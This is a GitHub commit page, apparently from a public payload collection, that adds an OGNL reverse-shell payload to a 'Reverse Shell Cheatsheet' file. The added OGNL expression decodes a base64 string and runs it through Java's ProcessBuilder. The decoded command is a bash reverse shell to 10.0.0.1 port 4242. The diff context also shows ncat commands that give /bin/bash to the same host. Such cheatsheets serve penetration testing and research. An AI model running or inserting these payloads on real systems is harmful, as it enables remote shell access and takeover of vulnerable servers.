Skip to content

Commit

Permalink
Merge pull request swisskyrepo#704 from therealtoastycat/patch-1
Browse files Browse the repository at this point in the history 
Adding reverse shell payload for OGNL
  • Loading branch information
@swisskyrepo
swisskyrepo authored Jan 5, 2024
2 parents c6f96f7 + 05f441a commit 4b77292
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions Methodology and Resources/Reverse Shell Cheatsheet.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -22,6 +22,7 @@
* [Netcat BusyBox](#netcat-busybox)
* [Netcat Traditional](#netcat-traditional)
* [NodeJS](#nodejs)
* [OGNL](#ognl)
* [OpenSSL](#openssl)
* [Perl](#perl)
* [PHP](#php)
Expand Down Expand Up @@ -252,6 +253,14 @@ ncat 10.0.0.1 4242 -e /bin/bash
ncat --udp 10.0.0.1 4242 -e /bin/bash
```

### OGNL

```java
(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg== | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start())
```

With `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg==` decoding to `bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1'`, the payload within the single quotes might be changed by any Linux-compatible reverse shell.

### OpenSSL

Attacker:
Expand Down

0 comments on commit 4b77292

Please sign in to comment.